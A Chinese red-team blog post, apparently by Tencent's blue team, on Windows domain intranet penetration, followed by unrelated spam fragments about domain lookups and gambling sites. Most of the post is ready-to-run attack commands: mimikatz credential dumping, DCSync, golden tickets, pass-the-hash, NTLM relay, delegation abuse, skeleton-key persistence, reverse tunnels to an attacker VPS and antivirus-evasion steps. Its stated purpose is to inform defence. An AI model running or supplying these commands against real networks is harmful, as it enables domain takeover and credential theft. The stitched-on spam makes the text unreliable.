红蓝对抗之Windows内网渗透博客

无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进入内网,然后发起内网渗透。而国内外红蓝对抗服务和开源攻击工具大多数以攻击Windows域为主,主要原因是域控拥有上帝能力,可以控制域内所有员工电脑,进而利用员工的合法权限获取目标权限和数据,达成渗透目的。

本文以蓝军攻击视角,介绍常用的Windows内网渗透的手法,包括信息收集、传输通道、权限提升、密码获取、横向移动、权限维持、免杀处理,主要让大家了解内网渗透到手法和危害,以攻促防,希望能给安全建设带来帮助。

在攻陷一台机器后,不要一味的直接去抓取机器密码、去做一些扫描内网的操作,因为如果网内有IDS等安全设备,有可能会造成报警,丢失权限。本节主要介绍当一台内网机器被攻破后,我们收集信息的一些手法。

SPN:服务主体名称。使用Kerberos须为服务器注册SPN,因此可以在内网中扫描SPN,快速寻找内网中注册的服务,SPN扫描可以规避像端口扫描的不确定性探测动作。主要利用工具有:setspn、GetUserSPNs.vbs和Rubeus。

a、利用Windows自带的setspn工具,普通域用户权限执行即可:

setspn-Tdomain.com-Q*/*

在上述截图中可以清晰的看到DCServer机器上运行了dns服务。如果网内存在mssql,利用SPN扫描也可以得到相应的结果。

b、利用GetUserSPNs.vbs也可以获取spn结果:

c、Rubeus工具是Harmj0y开发用于测试Kerberos的利用工具。

如下图利用Rubeus查看哪些域用户注册了SPN,也为后续Kerberoasting做准备:

一个正常的Web应用肯定有对应的数据库账号密码信息,是一个不错的宝藏。

可以使用如下命令寻找包含密码字段的文件:

cd/webfindstr/s/m“password”*.*

下面是常用应用的默认配置路径:

a、

Tomcat:CATALINA_HOME/conf/tomcat-users.xml

b、

c、

Nginx:/etc/nginx/nginx.conf

d、

Wdcp:/www/wdlinux/wdcp/conf/mrpw.conf

e、

Mysql:mysql\data\mysql\user.MYD

可以在网内收集用户等信息,对高权限用户做针对性的攻击,包括定位到域控,对域控发起攻击。

a、查看域用户,普通域用户权限即可:

netuser/domain

b、查看域管理员:

netgroup“domainadmins”/domain

nettime/domain

nslookup-type=all_ldap._tcp.dc._msdcs.jumbolab.com

d、查看域控制器:

netgroup“domaincontrollers”/domain

可以使用如下命令来达到内网主机的发现。

a、查看共享资料:

netview

b、查看arp表:

arp-a

c、查看hosts文件:

linux:cat/etc/hosts

windows:typec:\Windows\system32\drivers\etc\hosts

d、查看dns缓存:

ipconfig/displaydns

e、当然,利用一些工具也可以,比如nmap、nbtscan:

利用powershell脚本PowerView为例。

b、也可以查看机器被哪些用户登陆过:

拿下一台机器后,需要尽可能的收集信息。如下是几个常用软件保存密码的注册表地址,可以根据算法去解密保存的账号密码。

比如远程连接凭据:

cmdkey/list

navicat:

MySQLHKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\

MariaDBHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\

MongoDBHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers\

MicrosoftSQLHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\

OracleHKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\

PostgreSQLHKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\

SQLiteHKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\

SecureCRT:

xp/win2003

C:\DocumentsandSettings\USERNAME\ApplicationData\VanDyke\Config\Sessions

win7/win2008以上

C:\Users\USERNAME\AppData\Roaming\VanDyke\Config\Sessions

Xshell:

Xshell5

%userprofile%\Documents\NetSarang\Xshell\Sessions

Xshell6

%userprofile%\Documents\NetSarangComputer\6\Xshell\Sessions

WinSCP:

HKCU\Software\MartinPrikryl\WinSCP2\Sessions

VNC:

RealVNC

HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserverPassword

TightVNC

HKEY_CURRENT_USER\Software\TightVNC\ServerValuePasswordorPasswordViewOnly

TigerVNC

HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4Password

UltraVNC

C:\ProgramFiles\UltraVNC\ultravnc.inipasswdorpasswd2

DPAPI,由微软从Windows2000开始发布,称为DataProtectionApplicationProgrammingInterface(DPAPI)。其分别提供了加密函数CryptProtectData与解密函数CryptUnprotectData。

其作用范围包括且不限于:

outlook客户端密码

windowscredential凭据

chrome保存的密码凭据

internetexplorer密码凭据

DPAPI采用的加密类型为对称加密,存放密钥的文件则被称之为MasterKeyFiles,其路径一般为%APPDATA%\Microsoft\Protect{SID}{GUID}。其中{SID}为用户的安全标识符,{GUID}为主密钥名称。我们可以利用用户的密码/hash或域备份密钥解密主密钥,然后解密被dpapi加密的数据。

在渗透中,可以利用mimikatz做到自动化的数据解密:

a、解密Chrome密码:

mimikatzdpapi::chrome/in:”%localappdata%\Google\Chrome\UserData\Default\LoginData”/unprotect

b、解密Credential:

mimikatzvault::cred/patch

信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理。

查看域信任:

nltest/domain_trusts

上述结果显示child.jumbolab.com和jumbolab.com两个域是双向信任的。

当存在域传送漏洞时,可以获取域名解析记录。当有了解析记录后,也能提高对网络环境的进一步认知,比如www解析的ip段可能在dmz区,mail解析的ip段可能在核心区域等等。

windows:

nslookup-type=nsdomain.comnslookupsserverdns.domain.comlsdomain.com

linux:

在网内收集dns记录,可以快速定位一些机器、网站。常用工具有Dnscmd、PowerView。

a、在windowsserver上,可以使用Dnscmd工具获取dns记录。

获取dns记录:

Dnscmd./ZonePrintjumbolab.com

Dnscmd./EnumRecordsjumbolab.com.

b、在非windowsserver机器上,可以使用PowerView获取。

import-modulePowerView.ps1Get-DNSRecord-ZoneNamejumbolab.com

通过如下命令获取连接过的wifi密码:

当分发组策略时,会在域的SYSVOL目录下生成一个gpp配置的xml文件,如果在配置组策略时填入了密码,则其中会存在加密过的账号密码。这些密码,往往都是管理员的密码。

其中xml中的密码是aes加密的,密钥已被微软公开:

\domain\Netlogon

可以利用Seatbelt工具做一些自动化的信息收集,收集的信息很多,包括不限于google历史记录、用户等等:

当有了chrome的访问历史时,就可以知道该用户访问的一些内部站点的域名/IP,可以提高内网资产的摸索效率。

我们可以利用Bloodhound做一些自动化的信息收集,包括用户、计算机、组织架构、最快的攻击途径等。但是自动化也意味着告警,该漏洞做自动化信息收集时,会在内网设备上产生大量的告警,按需使用。

执行:

SharpHound.exe-call

运行完毕会生成一个zip压缩包,名字类似于20200526201154_BloodHound。

导入Bloodhound后可以做可视化分析:

比较常用的就是寻找攻击域控的最快途径了:

如下图,我们知道,如果拿下hand用户后,就可以获取到域控权限:

使用ruler工具对owa接口进行爆破:

./ruler—domaintargetdomain.combrute—users/path/to/user.txt—passwords/path/to/passwords.txt

ruler工具会自动搜索owa可以爆破的接口,如:

其他如ews接口也存在被暴力破解利用的风险:

Get-GlobalAddressList-ExchHostnamemail.domain.com-UserNamedomain\username-PasswordFall2016-OutFileglobal-address-list.txt

当我们拿下exchange服务器后,可以做一些信息收集,包括不限于用户、邮件。

Get-Mailbox

导出邮件:

New-MailboxexportRequest-mailboxusername-FilePath(“\localhost\c\$\test\username.pst”)

导出后会有记录,用如下命令可以查看:

Get-MailboxExportRequest

删除某个导出记录:

Remove-MailboxExportRequest-Identity‘username\mailboxexport’-Confirm:\$false

在做完信息收集后,为了方便进一步内网渗透,一般都会建立一个通道,甚至是多级跳板。

可以用以下命令判断:

ping:icmp

nslookup:dns

netsh是windows自带的命令,可以允许修改计算机的网络配置。也可以被拿来做端口转发。

A机器执行如下命令:

netshinterfaceportproxyaddv4tov4listenport=5555connectport=3389connectaddress=192.168.1.1protocol=tcp

B机器访问A机器的5555端口,即是192.168.1.1的3389端口

a、开启socks代理:

输入1.1.1.1机器密码,本地利用proxychains等类似工具连接本地的1111端口的sock5连接即可代理1.1.1.1的网络。

b、控制A、B机器,A能够访问B,且能出网,B能够访问C,但不能出网,A不能访问C:

A机器执行:

输入BIP机器密码,访问A的2121端口即是访问CIP的21端口。

c、控制A机器,A能够访问B:

输入黑客vps密码,访问黑客vps的2121端口即是访问BIP的21端口。

根据网站支持的语言,把相应的tunnel.xx传到服务器上,访问tunnel.xx显示“Georgsays,‘Allseemsfine’”,说明基本ok。

本地运行:

利用proxychains等类似工具连接本地的9999端口的sock5连接即可代理1.1.1.1的网络。

EarthWorm是一款用于开启SOCKSv5代理服务的工具,基于标准C开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

a、受害者机器有外网ip并可直接访问:

把ew传到对方服务器上,执行:

./ew-sssocksd-l8888

现在本地利用proxychains等类似工具连接本地的对方服务器的8888端口的sock5连接即可代理对方的网络。

b、控制A机器,A能够访问B,通过A访问B:

在自己外网服务器上执行:

./ew-srcsocks-l1080-e8888

对方服务器执行:

./ew-srssocks-dyourvpsip-e8888

利用proxychains等类似工具可通过连接你的外网vps的1080端口的socks5,即可代理受害者服务器的网络。

c、控制A、B机器,A能够访问B,B能够访问C,A有外网ip并可直接访问,通过A来使用B的流量访问C:

B机器执行:

./ew-sssocksd-l9999

A机器:

./ew-slcx_tran-l1080-fBIP-g9999

利用proxychains等类似工具可通过连接A的1080端口的socks5,即可代理B服务器的网络。

d、控制A、B机器,A能够访问B,B能够访问C,A没有外网ip,通过A连接自己的外网vps来使用B的流量访问C:

自己vps执行:

./ew-slcx_listen-l1080-e8888

./ew-slcx_slave-dvpsip-e8888-fBIP-g9999

利用proxychains等类似工具可通过连接你自己的vps的1080端口的socks5,即可代理B服务器的网络。

lcx是一款轻便的端口转发工具。

a、反向转发

外网VPS机器监听:

lcx.exe-listen11112222

受害者机器执行:

lcx.exe-slaveVPSip1111127.0.0.13389

连接外网VPS机器的2222端口即是连接受害者机器的3389。

b、正向转发

lcx.exe-tran11112.2.2.28080

访问A机器的1111端口即是访问2.2.2.2的8080端口。

powercat是一款ps版nc。可以本地执行,也可以远程下载执行,远程执行命令如下:

然后远程连接执行命令即可。如果嫌弃该命令太暴露,可以对其进行编码。

当目标机器只开放mssql时,我们也可以利用mssql执行clr作为传输通道。

环境如下:

工具项目地址:

明明是administrator权限,为什么有些命令执行不了?拿到一个普通的域用户权限后,如何拿到域控权限?继续往下看。

那如何寻找bypassuac的方法呢。我们可以找一些以高权限运行的,但是并没有uac提示的进程,然后利用ProcessMonitor寻找他启动调用却缺失的如dll、注册表键值,然后我们添加对应的值达到bypassuac的效果。

以高权限运行的进程图标一般有如下标志:

我们win10以ComputerDefaults.exe作为bypass案例,ComputerDefaults.exe进程图标确实有个uac的标志(然后你双击打开会发现并没有uac提醒),

我们利用ProcessMonitor对该进程的行为做一个监听:

先寻找HKCU:\Software\Classes\ms-settings\Shell\Open\Command注册表,然后发现键值不存在,再寻找HKCR:\ms-settings\Shell\Open\Command\DelegateExecute

因此当我们修改hkcu注册表后,运行ComputerDefaults.exe就会得到一个bypassuac后的cmd:

对了,当修改HKCU\Software\Classes\下的键值时,会同步修改HKCR下面的键值。

该漏洞可以在只有一个普通域用户的权限时,获取到域控权限。微软已经修复了该漏洞,对应的补丁号为kb3011780。下面介绍下漏洞的成因,先来一个Kerberos协议流程图:

大致流程如下:

2、域控的AS服务验证用户的密码是否正确。验证通过后,返回给用户一张TGT票据,该票据为krbtgt密码加密而成;

3、域用户拿着TGT向KDC的TGS服务申请访问ApplicationServer的票据

4、域控的TGS服务验证TGT通过后,返回给域用户能够访问ApplicationServer的票据,即ST,ST以ApplicationServer的服务账号密码加密;

5、域用户拿着ST访问对应的ApplicationServer;

6、ApplicationServer验证ST,决定成功与否。

下面简述ms14-068的问题所在:

TGT中作为用户凭证,包含了用户名、用户id、所属组等信息,即PAC。简单点讲,PAC就是验证用户所拥有权限的特权属性证书。

默认PAC是包含在TGT中的,而出现ms14-068这个问题的原因在于用户在申请TGT时可以要求KDC返回的TGT不包含PAC(include-PAC为false),然后用户自己构造PAC并放入TGS_REQ数据包中的REQ_BODY中,KDC会解密PAC并加密到一个新的TGT中(正常应该返回一个ST)并返回给用户,此时这个TGT已经带入了我们构造的恶意的PAC。后面就是正常的kerberos流程了。

利用方法:

也可以使用goldenPac.py来达到ms14-068+psexec的自动化利用:

密码抓取已经成为渗透中必不可少的一项技能。一个管理员很可能管理着N多台机器,但是密码使用的都是同一个或者是有规律的。如果抓到一台机器的密码,利用同密码碰撞,很可能这个渗透项目就结束了。本节主要介绍密码抓取的原理和一些手段。

先简单介绍下lmhash和ntlmhash。

我们经常看到的hash长这样:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

他的组成就是:

user:sid:lmhash:ntlmhash

lmhash的加密流程如下:

1、密码长度限制为14个字符

2、密码全部转换为大写

3、密码转换为16进制字符串,不足14字节用0补全

4、密码的16进制字符串被分成两个7byte部分

5、再分7bit为一组,每组末尾加0,再组成一组

6、上步骤得到的二组,分别作为key为“KGS!@#\$%”进行DES加密。

7、将加密后的两组拼接在一起,得到最终LMHASH值。

为了解决lmhash强度不够的问题,微软推出了ntlmhash:

1、先将用户密码转换为十六进制格式。

2、将十六进制格式的密码进行Unicode编码。

3、使用MD4对Unicode编码数据进行Hash计算

因为在vista后不再支持lmhash,因此抓到的hash中的lmhash都是aad3b435b51404eeaad3b435b51404ee

在hash传递攻击时,可以替换成0:

00000000000000000000000000000000

再看下ntlm认证的过程:

他的简述流程如下:

1、客户端向服务端发起认证

4、服务器接收客户端加密后的response,比较Challenge1和response,如果相同,验证成功。

上述中的response类似于下面这样:

上述中的response就可以理解为net-ntlmhash,因此ntlmhash我们是可以拿来hash传递的,而net-ntlmhash不可以,但是net-ntlmhash也可以拿来做破解和relay。

使用reg命令获取本地用户凭据hash:

regsavehklm\samsam.hiveregsavehklm\systemsystem.hiveregsavehklm\securitysecurity.hive

最后利用bootkey解密获取hash。

其他一些工具同理,比如

pwdump7:

mimikatz:

privilege::debugtoken::elevatelsadump::sam

当然,从lsass.exe中获取也可以。如直接使用mimikatz获取:

privilege::debugsekurlsa::logonpasswords

Procdump+Mimikatz:

procdump64.exe-accepteula-malsass.exelsass.dmpmimikatz.exe“sekurlsa::minidumplsass.dmp”“sekurlsa::logonPasswordsfull”exit

而为什么有的抓不到明文密码,主要还是kb2871997的问题。kb2871997补丁会删除除了wdigestssp以外其他ssp的明文凭据,但对于wdigestssp只能选择禁用。用户可以选择将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential更改为0来禁用。

它在winserver2012R2及以上版本已默认集成。在winserver2012R2上面测试,手动添加上述注册表的值为1,然后抓密码,发现只有wdigest能抓到明文密码了:

再提一下kb2871997补丁问题,除了“解决”上述明文密码问题,还“解决”了pth问题,但是kb2871997对于本地Administrator(rid为500,操作系统只认rid不认用户名)和本地管理员组的域用户是没有影响的。

当拿到域控权限时,可以从域控中的C:\Windows\NTDS\NTDS.dit导出所有用户hash。因为ntds.dit被占用,因此需要利用如卷影备份等手段copy出ntds.dit,然后利用如NTDSDumpEx.exe解析hash:

当拷贝ntds.dit时,由于网络、文件大小等问题,可以使用DRS协议获取hash凭据:

mimikatz.exeprivilege::debug“lsadump::dcsync/domain:jumbolab.com/all/csv”exit

有时为什么能抓到明文密码,有时并不能呢,除了上面说的kb2871997的问题以外,还有个“ReversibleEncryption”。

有个system权限进程:

以administrator权限窃取该进程token,成功获取system权限:

当然,降权也可以使用上述方法。

在KRB_TGS_REP中,TGS会返回给Client一张票据ST,而ST是由Client请求的Server端密码进行加密的。当Kerberos协议设置票据为RC4方式加密时,我们就可以通过爆破在Client端获取的票据ST,从而获得Server端的密码。

在上述SPN信息收集中得到一个域用户test注册了一个SPN,我们请求TGS:

再利用mimikatz导出:

最终成功获取该域用户密码:

弱口令,永远改不完。在内网中,也可以尝试对smb、3389、mssql弱口令进行密码暴力破解,但是要注意线程,密码数不要太多。当然,也可以使用不同账号,同个密码进行尝试。这里使用kerbrute对域用户/密码进行暴力破解:

爆破用户:

kerbruteuserenum-djumbolab.comusernames.txt

密码喷射:

kerbrutepasswordspray-djumbolab.comusername.txtaA1234567

LocalAdministratorPasswordSolution是密码解决方案,为了防止一台机器被抓到密码后,然后网内都是同密码机器导致被横向渗透。但是也存在相应的安全隐患,当我们拿下域控时,可以查看计算机本地密码;当权限配置不当时,也会导致其他用户有权限查看他人计算机本地密码:

powershellGet-ADComputercomputername-Propertiesms-Mcs-AdmPwd|selectname,ms-Mcs-AdmPwd

如果安装LAPS,在安装的软件列表里能看到:

当我们获取到某个机器账号密码、获取到hash了,后续我们应该怎么做,如何做,这就是本章介绍的内容。当然,当我们拿下更多的机器时,别忘记了,信息收集必不可少。

当我们获取到机器的账号密码的时候,可以尝试用以下几种方式进行连接并执行命令。

a、IPC

netuse\1.1.1.1\ipc\$“password”/user:username

b、Psexec

c、WMI

方法一wmic/user:”jumbolab.com\win7user”/password:”password”/node:172.16.127.184processcallcreate“notepad”

方法二Invoke-WmiMethod-classwin32_process-namecreate-argumentlist‘notepad’-ComputerName172.16.127.184-Credential‘jumbolab.com\win7user’

d、Schtasks

schtasks/create/s1.1.1.1/udomain\Administrator/ppassword/ru“SYSTEM”/tn“windowsupdate”/scDAILY/tr“calc”/Fschtasks/run/s1.1.1.1/udomain\Administrator/ppassword/tnwindowsupdate

e、AT

at\1.1.1.115:15calc

f、SC

sc\1.1.1.1createwindowsupdatebinpath=“calc”sc\1.1.1.1startwindowsupdate

g、REG

regadd\1.1.1.1\HKLM\Software\Microsoft\Windows\CurrentVersion\Run/vmyentry/tREG_SZ/d“calc”

h、DCOM

i、WINRM

当我们没有明文账号密码,只有hash时,可以尝试hash传递。

Invoke-WMIExec-Target1.1.1.1-Domaintest.local-Usernameusername-Hash7ECFFFF0C3548187607A14BAD0F88BB1-Command“calc.exe”-verbose

Invoke-SMBExec-Target1.1.1.1-Domaintest.local-Usernameusername-Hash7ECFFFF0C3548187607A14BAD0F88BB1-Command“calc.exe”-verbose

使用如下命令:

privilege::debugsekurlsa::pth/user:test1/domain:test.local/ntlm:7ECFFFF0C3548187607A14BAD0F88BB1

弹出cmd:

安装KB2871997补丁后,可以使用AES-256密钥进行hash传递:

抓取AES-256密钥:

mimikatz:privilege::debugsekurlsa::ekeysprivilege::debugsekurlsa::pth/user:test1/domain:test.local/aes256:aes256key

上述都是“主动性”的攻击行为,也就是主动去连接别人,那我们也可以尝试“被动性”攻击,当别人访问我们时,或者说是无感知访问时,我们能做什么操作?

实验环境:

win7172.16.127.184普通域用户

win10172.16.127.170域管

dcserver172.16.127.173域控

kali172.16.127.129攻击机

利用工具:

Responder、impacket

先来一段百科介绍,链路本地多播名称解析(LLMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机。它是包含在WindowsVista中,WindowsServer2008中,Windows7中,Windows8中和的Windows10。它也被实施systemd在Linux上-resolved。LLMNR定义在RFC4795。

在DNS服务器不可用时,DNS客户端计算机可以使用本地链路多播名称解析(LLMNR—Link-LocalMulticastNameResolution)(也称为多播DNS或mDNS)来解析本地网段上的名称。例如,如果路由器出现故障,从网络上的所有DNS服务器切断了子网,则支持LLMNR的子网上的客户端可以继续在对等基础上解析名称,直到网络连接还原为止。

除了在网络出现故障的情况下提供名称解析以外,LLMNR在建立临时对等网络(例如,机场候机区域)方面也非常有用。

翻译成白话文怎么说:你正常内网中如访问真实存在的机器,如jumbo01,当有一天你不小心输成了不存在的机器jumbo02,客户端就会问内网中谁是jumbo02啊,有没有是jumbo02的人啊。

攻击手法v1.0

首先我们如果访问一台不存在的机器jumbo02,是以下这个结果

那我们如果我们在客户端询问谁是jumbo02的时候应答他的话,就是这个结果

攻击机执行

responder-Ieth0

客户端访问jumbo02提示需要输入密码

输入密码后,攻击机收到net-ntlm:

收到net-ntlm以后我们就可以尝试利用hashcat进行破解等攻击。

先来一段百科介绍,网络代理自动发现协议(WebProxyAuto-DiscoveryProtocol,WPAD)是一种客户端使用DHCP和/或DNS发现方法来定位一个配置文件URL的方法。在检测和下载配置文件后,它可以执行配置文件以测定特定URL应使用的代理。

翻译成白话文怎么说:就是你的上网配置、怎么上网,如果你浏览器设置了上网自动检测设置(默认配置),客户端上网的时候,就会问,谁是wpad服务器啊,你是wpad服务器啊,然后拿着pac文件上网去了。

那如果我们伪造wpad服务器的话,首先攻击机执行

responder-Ieth0-wFb

这里使用-b参数强制使用401认证

输入账号密码以后,我们收到明文账号密码

从responder的信息反馈能得知,实际上是利用wpad欺骗返回了一个401认证,导致欺骗我们获取了其账号密码。

攻击手法v1.1

既然我们能够让客户端下载我们的pac,就能在pac里面让客户端的流量走我们这边,这里我利用msf配置burp演示代理抓取客户端流量。

打开burp,以下只在非域内但是同一个网络中的机器的firefox成功

In2016however,MicrosoftpublishedasecuritybulletinMS16-077,whichmitigatedthisattackbyaddingtwoimportantprotections:–ThelocationoftheWPADfileisnolongerrequestedviabroadcastprotocols,butonlyviaDNS.–Authenticationdoesnotoccurautomaticallyanymoreevenifthisisrequestedbytheserver.

利用mitm6让客户端设置我们为ipv6dns服务器

wpad成功在chrome上欺骗

PS:以上成功还是在非域内机器。

攻击手法v2.0

上面说了多,最重要的不过还是权限。大家应该知道smbrelay,但是这个漏洞很早就在MS08-068补丁中被修复了。但是这个不妨碍我们在未校验smb签名等情况下进行NTLM-Relay转发。我们执行responder,首先关闭掉smb,给接下来的ntlmrelayx使用。

responder-Ieth0ntlmrelayx.py-t172.16.127.173-l./

域管机器访问不存在的机器时,会中继到域控机器,我们成功获取shell

当存在子父域时,默认其是双向信任。可以利用sidhistory跨域提权。流程大致如下:

利用如下,使用mimikatz获取子域的KrbtgtHash:

lsadump::lsa/patch|

再使用powerview获取父域的sid:

Get-DomainComputer-Domainjumbolab.com

然后添加一个sid=519的企业管理员,利用mimikatz执行如下命令:

最终成功获取父域权限:

在域中,最核心的就是kerberos协议了,但是也会出现各种安全问题,甚至可以以一个普通域用户提权到system权限,配置不当甚至可以获取到域控权限。

当我们抓取到了krbtgthash时,能做什么?继续往下看。

上面提到了ms14-068,也介绍Kerberos协议,知道了TGT是由krbtgt加密而成。因此当拿到krbtgt账号hash时,就可以构造一个任意权限的tgt了:

使用方法:

mimikatzkerberos::purgekerberos::golden/admin:administrator/domain:域/sid:SID/krbtgt:krbtgthash值/ticket:administrator.kiribikerberos::pttadministrator.kiribikerberos::tgtdir\dc.domain.com\c\$

上面的金票据是伪造的TGT,银票据是伪造TGS,由服务账号密码加密而成。

mimikatz.exe“kerberos::golden/domain:域/sid:SID/target:域控全称/service:要访问的服务,如cifs/rc4:NTLM,计算机账号hash/user:user/ptt”dir\server\c\$

利用kekeo进行ptt:

kekeo“tgt::ask/user:test1/domain:test.local/ntlm:7ECFFFF0C3548187607A14BAD0F88BB1”

接下来导入票据:

流程图如下:

个人简单理解为A机器设置基于资源的约束委派给B(设置msDS-AllowedToActOnBehalfOfOtherIdentity属性),则B可以通过s4u协议申请高权限票据对A进行利用。利用过程如下:

普通域用户默认可以添加10个机器账号,添加spnspnspn\$并设置msds-allowedtoactonbehalfofotheridentity:

get-adcomputerwin7-propertiesprincipalsallowedtodelegatetoaccount

利用s4u协议申请高权限票据:

getST.py-dc-ip172.16.127.173jumbolab.com/spnspnspn\$:spnspnspn-spncifs/win7.jumbolab.com-impersonateadministrator

导入票据:

exportKRB5CCNAME=administrator.ccache

访问目标机器:

smbexec.py-no-pass-k-debugwin7.jumbolab.com

个人简单理解为user访问service1服务时,如果service1服务开启了非约束委派,则在user访问service1服务时,会把自身的tgt发送给service1,因此service1可以利用user的tgt去访问user可以访问的服务。利用过程如下:

win7机器开启了非约束委派:

下面我们再利用Spooler打印机服务错误强制让运行了spooler服务的机器通过kerberos或ntlm的方式连接指定的目标机器:

SpoolSample.exedcserverwin7

导出tgt:

mimikatzprivilege::debugsekurlsa::tickets/export

win7机器即可获取所有用户hash:

发现非约束委派机器可以用如下命令:

查找域中配置非约束委派用户:

Get-NetUser-Unconstrained-Domainjumbolab.com

查找域中配置非约束委派的主机:

Get-NetComputer-Unconstrained-Domainjumbolab.com

利用过程如下:

存在服务用户,test,并设置约束委派:

服务账号可以为一个域用户设置spn即可:

setspn.exe-U-Atest/testtest

申请tgt:

kekeo:tgt::ask/user:test/domain:jumbolab.com/password:aA123456

利用生成的tgt申请st:

导入st:

发现约束委派机器可以用如下命令:

查找域中配置约束委派用户:

Get-DomainUser-TrustedToAuth-Domainjumbolab.com

查找域中配置约束委派的主机:

Get-DomainComputer-TrustedToAuth-Domainjumbolab.com

当拿下域控后,可以在域控上面做一些手脚,以保证后续的权限维持,甚至可以保证,就算域控密码改了,我们依然可以连接。

该方法相当于重置了域控机器上的本地管理员密码。

DSRM,目录服务还原模式,是Windows服务器域控制器的安全模式启动选项。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。DSRM账户实际上就是“Administrator”,也就是域控上面的本地管理员账号,非域管理员账号。当建立域控时,会让我们设置DSRM密码:

我们用如下命令在域控上同步DSRM密码:

即把DSRM重置成了和win7user用户一样的密码:

再在域控上添加注册表:

regadd“HKLM\System\CurrentControlSet\Control\Lsa”/vDSRMAdminLogonBehavior/tREG_DWORD/d2

最后用pth连接过去:

sekurlsa::pth/domain:computername/user:Administrator/ntlm:b367819c0a8ccd792cad1d034f56a1fa

当我们获取到管理员权限时,可以通过添加组策略手段,实现用户开机自启动。

域控上执行过程如下:

打开gpmc.msc,编辑默认组策略:

然后添加启动项:

并在对应的组策略目录下添加你的文件:

再执行如下命令强制刷新组策略:

gpupdate/force

最终域内其他机器重启后就会执行对应的文件/脚本:

在系统启动的时候,SSP会被加载到lsass.exe中,也就是说我们可以自定义一个dll在系统启动时加载到lsass.exe中。

利用mimikatz:

1、将mimilib.dll复制到域控c:\windows\system32

2、添加注册表:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SecurityPackages\

添加mimilib.dll

也可以不重启,利用RPC加载SSP。

利用mimikatz安装一个万能密码,“mimikatz”,实现代码可以参考如下:

privilege::debugmisc::skeleton

当执行完上述命令后,就可以使用“mimikatz”作为一个万能密码,去连接域控,该方法可用于当域控密码被改掉时,我们依然可以去控制域控。

通过往lsass.exe进程中注入dll,达到通过HookPasswordChangeNotify拦截修改的帐户密码。该方法可用于拦截域内修改的密码。

在上述的攻击利用中,出现了各种各样的工具,但是现在的edr都对上述工具、上述手法都做了安全防护,因此如何绕过av,又是一段漫长的路。

以常见的cs上线生成的powershell为例。当使用默认ps命令时,会被直接拦截:

我们先简单理解为拦截了这个命令,那就先简单尝试下加点特殊符号,而这个符号又不影响程序运行,比如“\^”,但发现并不行:

那我们尝试把这个命令copy出来并换个名字试试呢?依然不行:

但是改成txt就成功了:

渗透日常中密码抓取必不可少,当看到域控在线,工具被杀,想抓密码怎么办?

第一种,配合上面的powershell绕过执行ps1版的mimikatz:

第二种,利用RPC加载SSP:

让lsass.exe自己dump内存:

微软签名的procdump也可以:

第三种,对工具本身做免杀,找个看起来无害化的工具:

如果手上没有IDE编译环境或者没有源码怎么办?找个被杀的工具:

用restorator工具加个版本信息,成功免杀:

找个内存加载的源码,把shellcode加载执行。简单过程如下:

申请内存->写入shellcode->创建线程执行

先利用cs生成shellcode:

示例代码如下:

编译后成功绕过杀毒软件:

我们可以使用windows自带的命令达到免杀的效果,比如:

msbuild:

Wmic:

这里收集了几个执行shellcode的常用白名单:

总结

本文介绍了内网渗透的攻击手法和利用工具,也有绕过AV安全防护的突破手段。希望借此提高大家内网渗透攻击和防御水平。当然,不可能面面俱到,比如ACL配置不当造成的提权、mimikatz等工具的源码解读,还需要大家一起慢慢品味。

文中涉及的技术信息,只限用于技术交流,切勿用于非法用途。欢迎探讨交流,行文仓促,不足之处,敬请不吝批评指正。

最后感谢腾讯蓝军多位前辈同事的帮助和指导。同时预告一下,也算是立个flag:为了让红蓝对抗不用过于依靠个人经验和能力以及提升对抗效率,腾讯蓝军的红蓝对抗自动化工具平台正在筹建中,希望投入实战后有机会再跟大家一起交流学习。

THE END
1.www2222.com子域名大全www2222.com二级域名www2222.com域名解析www.www2222.com 更多子域名 最新域名查询 xiaobi097.com www8443.com www74abab.com www.49853.com www.456mmm.com lmhb88.com www.1986114.com www.11arvna.com wwwkss159.com www.zpton.com www.jkmh.com www.haose01.com www.cwexfe.com www.av7777.net www.a9iab94.com 最新iP查询 60.205.https://site.ip138.com/www2222.com/domain.htm
2..cn国内域名实名认证和注册审核答疑根据cnnic要求,国内域名需要提交实名认证资料审核; 国内域名域名在注册成功后,会进入5天的注册信息审核期,审核期内可添加解析设置,实名审核中解析可能暂不会生效,需要尽快提交实名资料完成审核。 5天后未通过实名审核的,会被cnnic将域名设置为serverhold状态,无法解析。 https://m.dushi.com.cn/changshi/3glWjgYkry.html
3.登录?站点进入网站专属bet356手机网站,959彩票2.00,中甲积分榜,taptap最新版下载,bob博鱼官网登录ag手机网页版,遨游中国安卓1234上网彩票 澳门皇家官方网站 澳英备用 20选八开奖结果今天 牛牛规则讲解 澳门资料区免费大公开 万象澳彩认证高手 tube苹果版下载 澳门cc彩官方网站 ag平台游戏娱乐网投 ag8国际亚游手机版伽AG发财网安全http://m.alewolf.com/YSO/moa/oySPdk.html
